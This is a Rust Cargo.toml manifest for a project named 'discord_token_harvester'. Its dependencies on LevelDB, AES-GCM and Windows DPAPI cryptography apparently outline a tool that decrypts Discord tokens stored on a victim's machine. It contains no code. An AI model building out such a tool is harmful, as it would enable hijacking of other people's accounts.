[package]
name = "discord_token_harvester"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
aes-gcm = { version = "0.10.2", features = ["alloc"] }
base64 = "0.21.2"
fs_extra = "1.3.0"
rusty-leveldb = "1.0.6"
serde_json = "1.0.99"
sysinfo = "0.28.4"
# winapi = { version = "0.3.9", features = ["dpapi"] }
windows = { version = "0.48.0", features = [
  "Win32_Foundation",
  "Win32_Security_Cryptography",
] }
